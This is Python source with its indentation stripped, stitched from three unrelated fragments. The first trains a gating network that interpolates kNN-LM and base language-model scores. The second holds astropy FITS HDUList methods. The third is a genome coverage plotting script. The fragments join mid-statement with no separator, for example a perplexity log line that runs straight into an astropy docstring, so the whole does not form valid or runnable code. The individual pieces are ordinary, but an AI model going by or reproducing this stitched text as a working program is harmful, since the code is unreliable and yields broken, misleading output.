prediction_dict = {}
for i, sample in enumerate(val_dataloader, 0):
inputs, lm_scores, knn_scores= sample['feature'], sample['lm_scores'], sample['knn_scores']
# inputs, labels = sample_check['feature'], sample_check['label']
# import pdb;pdb.set_trace()
log_weight = model(inputs)
cross_entropy = log_weight + torch.stack((lm_scores, knn_scores), dim=-1)
# (B,)
cross_entropy = -torch.logsumexp(cross_entropy, dim=-1)
loss = cross_entropy.mean()
ent_loss = loss
if args.l1 > 0:
loss = loss + args.l1 * torch.abs(log_weight.exp()[:,1]).sum() / log_weight.size(0)
# (batch)
preds = log_weight[:, 0]
# import pdb; pdb.set_trace()
for id_, p in zip(sample['id'], preds):
prediction_dict[id_.item()] = p.item()
bsz = next(iter(inputs.values())).size(0)
running_loss += ent_loss.item() * bsz
nsamples += bsz
val_loss = running_loss / nsamples
print(f"val loss: {val_loss:.3f}, ppl: {np.exp(val_loss)}")
return val_loss, prediction_dict
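# The gating model returns log mixture weights of shape (batch, 2): column 0 is the
# log-weight of the base LM and column 1 the log-weight of the kNN component. The
# per-token loss above is therefore -log(w_lm * p_lm + w_knn * p_knn), computed
# stably with logsumexp.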
def interpolation(hypos, predictions, lambda_=0.75):
scores = 0
cnt = 0
ndict = 267744
assert len(predictions) == len(hypos)
for i, (hypo, pred) in enumerate(zip(hypos, predictions)):
# if i % 1000 == 0:
# print(f'interpolation processed {i} tokens')
knn_weight = pred * np.log(1-lambda_) + (1 - pred) * (-1e5)
lm_weight = pred * np.log(lambda_)
knn_scores = hypo['knn_s']
lm_scores = hypo['lm_s']
combine = logsumexp(np.stack((knn_scores + knn_weight, lm_scores+lm_weight), axis=-1), axis=-1)
scores += combine.sum()
cnt += 1
return np.exp(-scores / cnt)
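# interpolation() implements fixed-weight interpolation gated per token by `pred`:
# with pred == 1 a token is scored as log(lambda * p_lm + (1 - lambda) * p_knn),
# while with pred == 0 the kNN term is effectively switched off (its log-weight is
# -1e5) and the token falls back to the pure LM probability. Passing an all-zero
# prediction vector therefore yields the "no retrieval" perplexity printed later in
# this script.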
def moe_interpolation(hypos, predictions, cutoff=None, random_mask=None, constant_weight=None, threshold=None):
"""perform interpolation while weights are output from a
gating network. only perform retrieval in a certain portion
of tokens when cutoff is not None
"""
scores = 0
cnt = 0
ts = None
# ndict = 267744
assert len(predictions) == len(hypos)
predictions_copy = predictions
if constant_weight is not None:
predictions = [constant_weight] * len(predictions_copy)
if cutoff is not None:
if random_mask is None:
if threshold is not None:
ts = threshold[cutoff * 100]
mask = (predictions_copy >= ts).astype('float')
print(f'actual cutoff {mask.sum() / len(mask)}')
else:
ts = np.sort(predictions_copy)[int(len(predictions_copy) * (1. - cutoff))]
mask = (predictions_copy >= ts).astype('float')
else:
# mask = np.zeros(len(predictions))
# mask[int(len(predictions) * (1. - cutoff)):] = 1
# np.random.shuffle(mask)
# mask = mask.astype('float')
ts = None
mask = random_mask
lm_weights = (1-mask) * predictions + mask * 0.
knn_prob = 1. - np.exp(predictions)
overflow = (knn_prob <= 0)
knn_prob = np.clip(knn_prob, 1e-5, 1)
knn_weights = np.log(knn_prob)
knn_weights[overflow] = -1e5
knn_weights = (1-mask) * knn_weights + mask * (-1e5)
else:
lm_weights = predictions
knn_prob = 1. - np.exp(predictions)
overflow = (knn_prob <= 0)
knn_prob = np.clip(knn_prob, 1e-5, 1)
knn_weights = np.log(knn_prob)
knn_weights[overflow] = -1e5
for hypo, lm_weight, knn_weight in zip(hypos, lm_weights, knn_weights):
knn_scores = hypo['knn_s']
lm_scores = hypo['lm_s']
combine = logsumexp(np.stack((knn_scores + knn_weight, lm_scores+lm_weight), axis=-1), axis=-1)
scores += combine.sum()
cnt += 1
return np.exp(-scores / cnt), ts
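# In moe_interpolation() the predictions are the log LM-weights produced by the
# gating network; the kNN log-weight is log(1 - exp(pred)). When `cutoff` is given,
# a threshold is chosen so that roughly a `cutoff` fraction of tokens, the ones with
# the highest predicted LM-weight, skip retrieval entirely: their kNN log-weight is
# forced to -1e5 and their LM log-weight to 0.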
def train_test_split(x, y, test_size=0.2):
assert len(x) == len(y)
indexes = np.arange(len(x))
np.random.shuffle(indexes)
boundary = int(len(x) * test_size)
test_indexes = indexes[:boundary]
train_indexes = indexes[boundary:]
x_train = [x[i] for i in train_indexes]
y_train = [y[i] for i in train_indexes]
x_test = [x[i] for i in test_indexes]
y_test = [y[i] for i in test_indexes]
return x_train, x_test, y_train, y_test, train_indexes, test_indexes
def save_val_pred(hypos, predictions, path):
new_hypos = []
predictions = predictions.astype('float')
start = 0
assert len(hypos) == len(predictions)
for hypo, pred in zip(hypos, predictions):
hypo['pred'] = pred
new_hypos.append(hypo)
with open(path, 'w') as fout:
for hypo in new_hypos:
fout.write(json.dumps(hypo, ensure_ascii=False))
fout.write('\n')
fout.flush()
def read_input(input, debug=False):
fname = 'features_small.jsonl' if debug else input
dataset = load_dataset('json', data_files=fname, cache_dir='hf_cache', use_threads=True)
return dataset['train']
parser = argparse.ArgumentParser(description='')
parser.add_argument('--train', type=str, default=None,
help='the input feature file (jsonl)')
parser.add_argument('--val', type=str, default=None,
help='the input feature file (jsonl)')
parser.add_argument('--train-others', type=str, default=None,
help='use a specified jsonl file for others feature if specified')
parser.add_argument('--val-others', type=str, default=None,
help='use a specified jsonl file for others feature if specified')
parser.add_argument('--input', type=str, default=None,
help='the input feature file (jsonl). Multiple files are separated with comma')
parser.add_argument('--negative-weight', type=float, default=1,
help='weight of the loss from negative examples, range [0,1]')
parser.add_argument('--feature-type', type=str, default='all',
help='the features to use, splitted with commas')
parser.add_argument('--seed', type=int, default=22,
help='the random seed')
parser.add_argument('--debug', action='store_true', default=False,
help='debug mode')
# interpolation with ngram kenlm instead of knnlm
parser.add_argument('--train-kenlm', type=str, default=None,
help='the output score file from kenlm querying, note that the scores in this kenlm output \
is in log base 10 by default')
parser.add_argument('--val-kenlm', type=str, default=None,
help='the output score file from kenlm querying, note that the scores in this kenlm output \
is in log base 10 by default')
# training arguments
parser.add_argument('--lr', type=float, default=5e-4, help='learning rate')
parser.add_argument('--l1', type=float, default=0.,
help='l1 regularization coefficient')
parser.add_argument('--batch-size', type=int, default=64, help='batch size')
parser.add_argument('--ngram', type=int, default=0, help='the ngram features to use')
# model hyperparameters
parser.add_argument('--arch', type=str, choices=['mlp', 'lstm'], default='mlp',
help='architectures of the expert model')
parser.add_argument('--activation', type=str, choices=['linear', 'relu'], default='relu',
help='the activation function in mlp')
parser.add_argument('--hidden-units', type=int, default=32, help='hidden units')
parser.add_argument('--nlayers', type=int, default=3, help='number of layers')
parser.add_argument('--dropout', type=float, default=0, help='dropout')
parser.add_argument('--output-dir', type=str)
parser.add_argument('--move-to-mem', action='store_true', default=False)
parser.add_argument('--load-model', type=str, default=None,
help='load model checkpoint')
parser.add_argument('--eval', action='store_true', default=False,
help='perform evaluation')
parser.add_argument('--save-pred', type=str, default=None,
help='save predictions for analysis')
parser.add_argument('--validate-loss', action='store_true', default=False,
help='compute the loss on the validation set')
args = parser.parse_args()
# args.output_dir = f'checkpoint/moe/mlp.nh{args.hidden_units}.nl{args.nlayers}.drop{args.dropout}.lr{args.lr}.ft{args.feature_type}.seed{args.seed}'
# if not os.path.isdir(args.output_dir):
# os.makedirs(args.output_dir)
logfile = 'stdout.log' if not args.eval else 'eval.log'
sys.stdout = Logger(os.path.join(args.output_dir, logfile))
print(args)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.input is not None:
hypos = []
if args.debug:
hypos = read_input(None, debug=args.debug)
else:
for fname in args.input.split(','):
hypos.extend(read_input(fname, debug=args.debug))
test_size = 0.2
indexes = np.arange(len(hypos))
# np.random.shuffle(indexes)
boundary = int(len(hypos) * test_size)
test_indexes = indexes[:boundary]
train_indexes = indexes[boundary:]
train_hypos = [hypos[x] for x in train_indexes]
val_hypos = [hypos[x] for x in test_indexes]
else:
train_ctxt_hypos = read_input(args.train + '_ctxt.jsonl', debug=args.debug)
if args.train_others is None:
train_other_hypos = read_input(args.train + '_others.jsonl', debug=args.debug)
else:
train_other_hypos = read_input(args.train_others)
val_ctxt_hypos = read_input(args.val + '_ctxt.jsonl', debug=args.debug)
if args.val_others is None:
val_other_hypos = read_input(args.val + '_others.jsonl', debug=args.debug)
else:
val_other_hypos = read_input(args.val_others)
if args.train_kenlm is not None:
train_kenlm = read_input(args.train_kenlm)
val_kenlm = read_input(args.val_kenlm)
else:
train_kenlm = None
val_kenlm = None
if args.move_to_mem:
train_ctxt_hypos = [train_ctxt_hypos[i] for i in range(len(train_ctxt_hypos))]
train_other_hypos = [train_other_hypos[i] for i in range(len(train_other_hypos))]
val_ctxt_hypos = [val_ctxt_hypos[i] for i in range(len(val_ctxt_hypos))]
val_other_hypos = [val_other_hypos[i] for i in range(len(val_other_hypos))]
print('complete reading jsonl files')
training_set = TokenFeatureDataset(train_ctxt_hypos, train_other_hypos, train_kenlm, ngram=args.ngram)
val_set = TokenFeatureDataset(val_ctxt_hypos, val_other_hypos, val_kenlm, ngram=args.ngram)
train_sampler = torch.utils.data.SequentialSampler(training_set) if args.arch == 'lstm' else None
val_sampler = torch.utils.data.SequentialSampler(val_set) if args.arch == 'lstm' else None
train_dataloader = torch.utils.data.DataLoader(training_set,
batch_size=args.batch_size,
shuffle=False if args.arch == 'lstm' else True,
sampler=train_sampler,
collate_fn=training_set.collater)
val_dataloader = torch.utils.data.DataLoader(val_set,
batch_size=args.batch_size,
shuffle=False,
sampler=val_sampler,
collate_fn=val_set.collater)
nepochs = 10
extra_feature_size = None
feature_set = ['ctxt', 'freq', 'lm_ent', 'lm_max', 'fert']
if args.feature_type == 'all':
feature_size = OrderedDict({key: training_set.get_nfeature(key) for key in feature_set})
else:
feature_size = OrderedDict({key: training_set.get_nfeature(key) for key in args.feature_type.split(',')})
args.feature_size = feature_size
if args.arch == 'mlp':
model = MLPMOE(
feature_size=feature_size,
hidden_units=args.hidden_units,
nlayers=args.nlayers,
dropout=args.dropout,
activation=args.activation,
)
elif args.arch == 'lstm':
model = LSTMMOE(
feature_size=feature_size,
hidden_units=args.hidden_units,
nlayers=args.nlayers,
dropout=args.dropout,
)
# criterion = nn.CrossEntropyLoss(weight=torch.tensor([args.negative_weight, 1]))
if args.load_model:
ckpt_path = os.path.join(args.load_model, 'checkpoint_best.pt')
ckpt = torch.load(ckpt_path)
model.load_state_dict(ckpt['param'])
print(f"loaded model ckpt from {ckpt_path} at epoch {ckpt['epoch']}")
if torch.cuda.is_available():
print('use cuda')
model.cuda()
# criterion.cuda()
print(model)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
model.train()
val_hypos_mem = []
tmp = time.time()
print('moving scores to memory')
for i, hypo in enumerate(val_other_hypos):
if args.val_kenlm is not None:
assert hypo['s'] == val_kenlm[i]['s']
knns = val_kenlm[i]['kenlm_s']
else:
knns = hypo['knn_s']
val_hypos_mem.append({'lm_s': hypo['lm_s'], 'knn_s': knns})
print(f'moving scores consumes {time.time() - tmp} seconds')
tmp = time.time()
print(f'no retrieval ppl {interpolation(val_hypos_mem, np.array([0] * len(val_hypos_mem)))}')
print(f'interpolation costs {time.time() - tmp} seconds')
cutoff_list = [10, 30, 50, 70, 90]
# cutoff_list = [50]
random_mask = {}
# log_str = 'random mask, constant weights, val interpolate ppl (cutoff): '
for cutoff in cutoff_list:
mask = np.zeros(len(val_hypos_mem))
mask[int(len(mask) * (1. - cutoff / 100)):] = 1
np.random.shuffle(mask)
mask = mask.astype('float')
random_mask[cutoff] = mask
if args.eval:
val_loss, prediction_dict = validate(val_dataloader, model, args)
predictions = np.array([prediction_dict[k] for k in range(len(val_hypos_mem))])
log_str = f'val interpolate ppl (cutoff): '
ppl, _ = moe_interpolation(val_hypos_mem, predictions)
log_str += f'0:{ppl:.3f}, '
for cutoff in cutoff_list:
ppl_cutoff, _ = moe_interpolation(val_hypos_mem, predictions, cutoff=cutoff / 100, threshold=ckpt['threshold'])
log_str += f'{cutoff}:{ppl_cutoff:.3f}, '
print(log_str)
log_str = f'random mask, learned weights ppl (cutoff): '
for cutoff in cutoff_list:
ppl_cutoff, _ = moe_interpolation(val_hypos_mem, predictions, cutoff=cutoff / 100, random_mask=random_mask[cutoff])
log_str += f'{cutoff}:{ppl_cutoff:.3f}, '
print(log_str)
log_str = f'learned mask, constant weights ppl (cutoff): '
of ``"fix"`` or
``"silentfix"`` with ``"+ignore"``, ``+warn``, or ``+exception"
(e.g. ``"fix+warn"``). See :ref:`verify` for more info.
clobber : bool
When `True`, overwrite the output file if exists.
checksum : bool
When `True` adds both ``DATASUM`` and ``CHECKSUM`` cards
to the headers of all HDU's written to the file.
"""
if (len(self) == 0):
warnings.warn("There is nothing to write.", AstropyUserWarning)
return
self.verify(option=output_verify)
# make sure the EXTEND keyword is there if there is extension
self.update_extend()
# make note of whether the input file object is already open, in which
# case we should not close it after writing (that should be the job
# of the caller)
closed = isinstance(fileobj, string_types) or fileobj_closed(fileobj)
# writeto is only for writing a new file from scratch, so the most
# sensible mode to require is 'ostream'. This can accept an open
# file object that's open to write only, or in append/update modes
# but only if the file doesn't exist.
fileobj = _File(fileobj, mode='ostream', clobber=clobber)
hdulist = self.fromfile(fileobj)
for hdu in self:
hdu._prewriteto(checksum=checksum)
try:
hdu._writeto(hdulist._file)
finally:
hdu._postwriteto()
hdulist.close(output_verify=output_verify, closed=closed)
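# Illustrative usage (the output path here is hypothetical):
#   hdulist.writeto('output.fits', clobber=True, checksum=True)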
def close(self, output_verify='exception', verbose=False, closed=True):
"""
Close the associated FITS file and memmap object, if any.
Parameters
----------
output_verify : str
Output verification option. Must be one of ``"fix"``,
``"silentfix"``, ``"ignore"``, ``"warn"``, or
``"exception"``. May also be any combination of ``"fix"`` or
``"silentfix"`` with ``"+ignore"``, ``+warn``, or ``+exception"
(e.g. ``"fix+warn"``). See :ref:`verify` for more info.
verbose : bool
When `True`, print out verbose messages.
closed : bool
When `True`, close the underlying file object.
"""
if self._file:
if self._file.mode in ['append', 'update']:
self.flush(output_verify=output_verify, verbose=verbose)
if closed and hasattr(self._file, 'close'):
self._file.close()
# Give individual HDUs an opportunity to do on-close cleanup
for hdu in self:
hdu._close(closed=closed)
def info(self, output=None):
"""
Summarize the info of the HDUs in this `HDUList`.
Note that this function prints its results to the console---it
does not return a value.
Parameters
----------
output : file, bool, optional
A file-like object to write the output to. If `False`, does not
output to a file and instead returns a list of tuples representing
the HDU info. Writes to ``sys.stdout`` by default.
"""
if output is None:
output = sys.stdout
if self._file is None:
name = '(No file associated with this HDUList)'
else:
name = self._file.name
results = ['Filename: %s' % name,
'No. Name Type Cards Dimensions Format']
format = '%-3d %-10s %-11s %5d %-10s %s %s'
default = ('', '', 0, (), '', '')
for idx, hdu in enumerate(self):
summary = hdu._summary()
if len(summary) < len(default):
summary += default[len(summary):]
summary = (idx,) + summary
if output:
results.append(format % summary)
else:
results.append(summary)
if output:
output.write('\n'.join(results))
output.write('\n')
output.flush()
else:
return results[2:]
def filename(self):
"""
Return the file name associated with the HDUList object if one exists.
Otherwise returns None.
Returns
-------
filename : a string containing the file name associated with the
HDUList object if an association exists. Otherwise returns
None.
"""
if self._file is not None:
if hasattr(self._file, 'name'):
return self._file.name
return None
@classmethod
def _readfrom(cls, fileobj=None, data=None, mode=None,
memmap=None, save_backup=False, cache=True, **kwargs):
"""
Provides the implementations from HDUList.fromfile and
HDUList.fromstring, both of which wrap this method, as their
implementations are largely the same.
"""
if fileobj is not None:
if not isinstance(fileobj, _File):
# instantiate a FITS file object (ffo)
ffo = _File(fileobj, mode=mode, memmap=memmap, cache=cache)
else:
ffo = fileobj
# The pyfits mode is determined by the _File initializer if the
# supplied mode was None
mode = ffo.mode
hdulist = cls(file=ffo)
else:
if mode is None:
# The default mode
mode = 'readonly'
hdulist = cls()
# This method is currently only called from HDUList.fromstring and
# HDUList.fromfile. If fileobj is None then this must be the
# fromstring case; the data type of ``data`` will be checked in the
# _BaseHDU.fromstring call.
hdulist._save_backup = save_backup
saved_compression_enabled = compressed.COMPRESSION_ENABLED
try:
if ('disable_image_compression' in kwargs and
kwargs['disable_image_compression']):
compressed.COMPRESSION_ENABLED = False
# read all HDUs
while True:
try:
if fileobj is not None:
if ffo.writeonly:
# Output stream--not interested in reading/parsing
# the HDUs--just writing to the output file
return hdulist
try:
hdu = _BaseHDU.readfrom(ffo, **kwargs)
except EOFError:
break
except IOError:
if ffo.writeonly:
break
else:
raise
else:
if not data:
break
hdu = _BaseHDU.fromstring(data)
data = data[hdu._data_offset + hdu._data_size:]
hdulist.append(hdu)
hdu._new = False
if 'checksum' in kwargs:
hdu._output_checksum = kwargs['checksum']
# check in the case there is extra space after the last HDU or
# corrupted HDU
except (VerifyError, ValueError) as exc:
warnings.warn(
'Error validating header for HDU #%d (note: Astropy '
'uses zero-based indexing).\n%s\n'
'There may be extra bytes after the last HDU or the '
'file is corrupted.' %
(len(hdulist), indent(str(exc))), VerifyWarning)
del exc
break
# If we're trying to read only and no header units were found,
# raise an exception
if mode in ('readonly', 'denywrite') and len(hdulist) == 0:
raise IOError('Empty or corrupt FITS file')
# initialize/reset attributes to be used in "update/append" mode
hdulist._resize = False
hdulist._truncate = False
finally:
compressed.COMPRESSION_ENABLED = saved_compression_enabled
return hdulist
def _verify(self, option='warn'):
text = ''
errs = _ErrList([], unit='HDU')
# the first (0th) element must be a primary HDU
if len(self) > 0 and (not isinstance(self[0], PrimaryHDU)) and \
(not isinstance(self[0], _NonstandardHDU)):
err_text = "HDUList's 0th element is not a primary HDU."
fix_text = 'Fixed by inserting one as 0th HDU.'
def fix(self=self):
self.insert(0, PrimaryHDU())
err = self.run_option(option, err_text=err_text,
fix_text=fix_text, fix=fix)
errs.append(err)
if len(self) > 1 and ('EXTEND' not in self[0].header or
self[0].header['EXTEND'] is not True):
err_text = ('Primary HDU does not contain an EXTEND keyword '
'equal to T even though there are extension HDUs.')
fix_text = 'Fixed by inserting or updating the EXTEND keyword.'
def fix(header=self[0].header):
naxis = header['NAXIS']
if naxis == 0:
after = 'NAXIS'
else:
after = 'NAXIS' + str(naxis)
header.set('EXTEND', value=True, after=after)
errs.append(self.run_option(option, err_text=err_text,
fix_text=fix_text, fix=fix))
# each element calls their own verify
for idx, hdu in enumerate(self):
if idx > 0 and (not isinstance(hdu, ExtensionHDU)):
err_text = ("HDUList's element %s is not an extension HDU." %
str(idx))
err = self.run_option(option, err_text=err_text, fixable=False)
errs.append(err)
else:
result = hdu._verify(option)
if result:
errs.append(result)
return errs
def _flush_update(self):
"""Implements flushing changes to a file in update mode."""
for hdu in self:
# Need to all _prewriteto() for each HDU first to determine if
# resizing will be necessary
hdu._prewriteto(checksum=hdu._output_checksum, inplace=True)
try:
self._wasresized()
# if the HDUList is resized, need to write out the entire contents of
# the hdulist to the file.
if self._resize or self._file.compression:
self._flush_resize()
else:
# if not resized, update in place
for hdu in self:
hdu._writeto(self._file, inplace=True)
# reset the modification attributes after updating
for hdu in self:
hdu._header._modified = False
finally:
for hdu in self:
hdu._postwriteto()
def _flush_resize(self):
"""
Implements flushing changes in update mode when parts of one or more HDU
need to be resized.
"""
old_name = self._file.name
old_memmap = self._file.memmap
name = _tmp_name(old_name)
if not self._file.file_like:
old_mode = os.stat(old_name).st_mode
# The underlying file is an actual file object. The HDUList is
# resized, so we need to write it to a tmp file, delete the
# original file, and rename the tmp file to the original file.
if self._file.compression == 'gzip':
new_file = gzip.GzipFile(name, mode='ab+')
elif self._file.compression == 'bzip2':
new_file = bz2.BZ2File(name, mode='w')
else:
new_file = name
hdulist = self.fromfile(new_file, mode='append')
for hdu in self:
hdu._writeto(hdulist._file, inplace=True, copy=True)
if sys.platform.startswith('win'):
# Collect a list of open mmaps to the data; this will be used
# later. See below.
mmaps = [(idx, _get_array_mmap(hdu.data), hdu.data)
for idx, hdu in enumerate(self) if hdu._has_data]
hdulist._file.close()
self._file.close()
if sys.platform.startswith('win'):
# Close all open mmaps to the data. This is only necessary on
# Windows, which will not allow a file to be renamed or deleted
# until all handles to that file have been closed.
for idx, mmap, arr in mmaps:
if mmap is not None:
stats[0].otherReferenceName) )
fig, pdf = libplot.initImage( 12.0, 8.0, options )
axes = fig.add_axes( [0.09, 0.2, 0.9, 0.6] )
drawCompareData( axes, options, stats, isAbs )
libplot.writeImage( fig, pdf, options )
#================== DRAW ONLY BASES OF EACH SAMPLE THAT MAPPED TO CACTUS REF ==================
def drawCompareData2( axes, options, stats, isAbs ):
if len(stats) == 0:
return
#if isAbs, draw absolute values. If not, draw proportion (relative values)
lines = []
linenames = [ stats[0].otherReferenceName, stats[0].referenceName, "total" ]
#X data:
x1data = []
currx = -1
for i,s in enumerate( stats ):
if s.name == 'all':
continue
if s.name == 'average' or s.name == 'panTro3':
currx += 1.5
else:
currx += 1
x1data.append( currx )
y1data = []
for sample in stats:
if sample.name == 'all':
continue
if isAbs:
y1data.append( sample.referenceBasesMapped )
else:
y1data.append( 100.0*sample.referenceBasesMapped/sample.totalBases )
barwidth = 0.6
#barwidth = 0.25
l1 = axes.bar( x1data, y1data, barwidth, color = "#E31A1C", ec="w" )
lines.append( l1[0] )
libplot.editSpine( axes )
axes.set_title("Sample Coverage") #TO BE NAMED
#set ticks:
samples = []
for sample in stats:
if sample.name == 'all':
continue
samples.append( libplot.properName(sample.name) )
fontP = FontProperties()
fontP.set_size('small')
pyplot.xticks( [x + barwidth/2.0 for x in x1data], samples, rotation=45, fontproperties=fontP )
pyplot.yticks( fontproperties=fontP )
#HACK:
yticks = range(2000000, 6000000, 500000)
yticklabels = [ float(y)/1000000 for y in yticks ]
axes.set_yticks(yticks)
axes.set_yticklabels(yticklabels)
pyplot.xlabel("Samples")
pyplot.ylabel("Number of positions (in millions)")
axes.xaxis.set_ticks_position( 'bottom' )
axes.yaxis.set_ticks_position( 'left' )
miny = min( y1data )
miny = miny*0.9
axes.set_ylim( miny, max(y1data) )
axes.set_xlim(-0.5, max(x1data) + 0.5 )
axes.yaxis.grid(b=True, color="#A8A8A8", linestyle='-', linewidth=0.25)
#Legend:
box = axes.get_position()
axes.set_position( [box.x0, box.y0, box.width*0.95, box.height*0.9] )
#legend = axes.legend( lines, [libplot.properName(n) for n in linenames], prop=fontP, loc="best", bbox_to_anchor=(0.2, 1) )
#legend._drawFrame=False
return
def drawCompareCoveragePlot2( options, stats, isAbs ):
if len(stats) == 0:
return
prefix = "cmpCoverage2_"
if not isAbs:
prefix = "cmpRelCoverage2_"
options.out = os.path.join( options.outdir, "%s%s_%s" %(prefix, stats[0].referenceName, stats[0].otherReferenceName) )
fig, pdf = libplot.initImage( 12.0, 8.0, options )
axes = fig.add_axes( [0.09, 0.2, 0.9, 0.6] )
drawCompareData2( axes, options, stats, isAbs )
libplot.writeImage( fig, pdf, options )
#================ display data in scatter plot form, xaxis = number of sample covered, yaxis = number of bases
def drawScatter( axes, options, stats, type, cumulative ):
if len(stats) < 4:
return
title = "Distribution of Positions Shared Among Samples"
if cumulative:
title = "Cumulative Distribution of Positions Shared Among Samples"
axes.set_title(title) #TO BE NAMED
#samples = ["panTro3", "minusOtherReference", "average", "reference", "hg19"]
samples = ["reference", "hg19", "panTro3", "average"]
if type == 'noHg19':
samples = ["minusOtherReference"]
xdata = range( 0, len(stats) -4 )
#print xdata
ydataList = []
miny = float('inf')
maxy = float('-inf')
for name in samples:
for s in stats:
if s.name == name:
ydata = s.baseCoverages[: len(stats) -4]
if cumulative:
ydata = [ sum(ydata[i:]) for i in xrange( len(ydata) ) ]
ydataList.append( ydata )
miny = min( [miny, min(ydata)] )
maxy = max( [maxy, max(ydata)] )
break
lines = []
#colors = libplot.getColors0()
colors =["#E31A1C", "#1F78B4", "#3D3D3D", "#4DAF4A"] #ConsensusRef, GRCh37, chimp, average
c = -1
offset = 0.12
axes.set_yscale('log')
#if type == 'noHg19':
# axes.set_yscale('log')
for i in xrange( len(samples) ):
xdatai = [x + offset*i for x in xdata]
ydata = ydataList[i]
c += 1
if i == 0:
axes.plot(xdatai[1:], ydata[1:], color="#CCCCCC", linestyle='-', linewidth=0.002)
else:
axes.plot(xdatai, ydata, color="#CCCCCC", linestyle='-', linewidth=0.002)
l = axes.plot(xdatai, ydata, color=colors[c], marker='.', markersize=12.0, linestyle='none')
lines.append(l)
fontP = FontProperties()
fontP.set_size('x-small')
yrange = maxy - miny
miny = miny - 10
maxy = maxy + yrange*0.1
xmin = -0.4
xmax = len(stats) - 4 -1 + offset*len(samples) + offset
libplot.editSpine(axes)
axes.set_xticks( [ i + offset*(len(samples)/2.0 ) for i in range(0, len(stats) -4)] )
axes.set_xticklabels( range(1, len(stats) -2) )
axes.xaxis.set_ticks_position( 'bottom' )
axes.yaxis.set_ticks_position( 'left' )
scale = len(str( int(maxy) )) - 1
ylabel = "Number of positions"
if type == "noHg19":
yticks = [ 10**y for y in range(scale + 1) ]
else:
#yticks = [ 10**y for y in range(scale + 2) ]
yticks = []
for y in range(scale + 1):
for y1 in range(1,10):
yticks.append(y1*(10**y))
axes.set_yticks( yticks )
minorLocator = LogLocator( base=10, subs = range(1, 10) )
axes.yaxis.set_minor_locator( minorLocator )
#else:
# yticks = range(0, int(maxy), 10**scale)
# yticklabels = [ y/(10**scale) for y in yticks ]
# axes.set_yticks( yticks )
# axes.set_yticklabels( yticklabels )
# ylabel += " (x%s)" %( libplot.prettyInt(10**scale) )
#ylabel += " (in millions)"
axes.set_xlim(xmin, xmax)
if type == "noHg19":
axes.set_ylim(miny, maxy)
else:
axes.set_ylim(10000, 1000000)#HACK
if type != 'noHg19':
legend = pyplot.legend( lines, [libplot.properName(s) for s in samples], numpoints=1, loc='lower right', prop=fontP )
legend._drawFrame = False
axes.set_xlabel( 'Number of samples' )
#if type == "noHg19":
# ylabel += " (x %d)" %(10**(scale -1))
axes.set_ylabel( ylabel )
#axes.xaxis.grid(b=True, color="#CCCCCC", linestyle='-', linewidth=0.005)
axes.yaxis.grid(b=True, color="#CCCCCC", linestyle='-', linewidth=0.005)
return
def drawScatterPlot( options, stats, type, cumulative ):
prefix = "coverageScatter_%s" %type
if cumulative:
prefix += "_culm"
options.out = os.path.join( options.outdir, "%s" %(prefix) )
fig, pdf = libplot.initImage( 12.0, 8.0, options )
axes = fig.add_axes( [0.1, 0.15, 0.85, 0.75] )
drawScatter( axes, options, stats, type, cumulative )
libplot.writeImage( fig, pdf, options )
#=================
def readfiles( options ):
statsList = [] #each element represents one input xml file
for f in options.files:
name = os.path.basename( f ).split( '.' )[0]
#print "file %s" %name
#stats = Stats(name)
stats = []
xmltree = ET.parse( f )
root = xmltree.getroot()
for sample in root.findall( 'statsForSample' ):
name = sample.attrib[ 'sampleName' ]
if name != '' and name != 'ROOT' and name not in options.filteredSamples:
stats.append( Sample( sample ) )
#if len(stats) > 0:
# stats.setRefName( stats[0].referenceName )
# stats.setOtherRefName( stats[0].otherReferenceName )
statsList.append( stats )
return statsList
def readRepeatInfo(file):
f = open(file, 'r')
sample2repeat = {} #key = sample, vals = [totalBases, repetitiveBases, Percentage]
f.readline()
for line in f.readlines():
items = line.strip().split('\t')
if len(items) < 4:
continue
sample2repeat[ items[0] ] = [ int(items[1]), int(items[2]), float(items[3]) ]
#Calculate average:
avr = [0, 0, 0]
numSamples = 0
for sample in sample2repeat:
if sample == 'panTro3':
continue
numSamples += 1
for i, val in enumerate( sample2repeat[sample] ):
avr[i] += val
if numSamples > 0:
for i in xrange( len(avr) ):
avr[i] /= numSamples
sample2repeat['average'] = avr
return sample2repeat
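# readRepeatInfo() above expects a tab-separated file with one header line followed
# by rows of the form
#   <sample>\t<totalBases>\t<repetitiveBases>\t<percentRepetitive>
# (the column names are descriptive guesses based on how the values are used).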
def initOptions( parser ):
parser.add_option('--title', dest='title', default='Coverage statistics', help='Based title of the plots, default=%default')
parser.add_option('--ycutoff', dest='ycutoff', default=0.9, type='float')
parser.add_option('--outdir', dest='outdir', default='.')
parser.add_option('--filteredSamples', dest='filteredSamples', help='Hyphen separated list of samples that were filtered out (not to include in the plot)')
parser.add_option('--repeatInfo', dest='repeatInfo', default='/hive/users/nknguyen/reconGit/referenceScripts/data/seqRepeatPercentage.txt')
#parser.add_option('--samplesOrder', dest='samplesOrder', default='', help='Order of the samples to display')
def checkOptions( args, options, parser ):
if len(args) < 1:
parser.error('Please specify at least one coverageStat.xml file\n')
options.files = []
for f in args:
if not os.path.exists( f ):
parser.error( '%s does not exist\n' %f )
else:
options.files.append( os.path.abspath( f ) )
if options.filteredSamples:
options.filteredSamples = options.filteredSamples.split('-')
else:
options.filteredSamples = []
def main():
usage = ( 'usage: %prog [options] file1.xml file2.xml\n\n'
'%prog takes in coverageStats.xml files and create an image file' )
parser = OptionParser( usage = usage )
initOptions( parser )
libplot.initOptions( parser )
options, args = parser.parse_args()
checkOptions( args, options, parser )
libplot.checkOptions( options, parser )
statsList = readfiles( options )
sample2repeat = readRepeatInfo( options.repeatInfo )
for stats in statsList:
stats.sort()
stats1 = []
for s in stats:
if s.name != 'all':
stats1.append(s)
drawCoveragePlot( options, stats1, True, 0 )
drawCoveragePlot( options, stats1, False, 0 )
if options.ycutoff > 0:
drawCoveragePlot( options, stats1, True, options.ycutoff )
drawCoveragePlot( options, stats1, False, options.ycutoff )
#sort by totalBases:
specialcases = {'average':None, 'all':None, 'panTro3':None}
sortedstats = []
for i in xrange( len(stats) ):
if stats[i].name in [ stats[i].referenceName, stats[i].otherReferenceName, 'minusOtherReference' ]:
continue
if stats[i].name in specialcases:
specialcases[ stats[i].name ] = stats[i]
else:
sortedstats.append( stats[i] )
sortedstats = sorted( sortedstats, key=lambda s: s.totalBases, reverse=True )
for k in specialcases:
s = specialcases[k]
if s:
sortedstats.append( s )
if len(sortedstats) > 0:
drawCompareCoveragePlot( options, sortedstats, True )
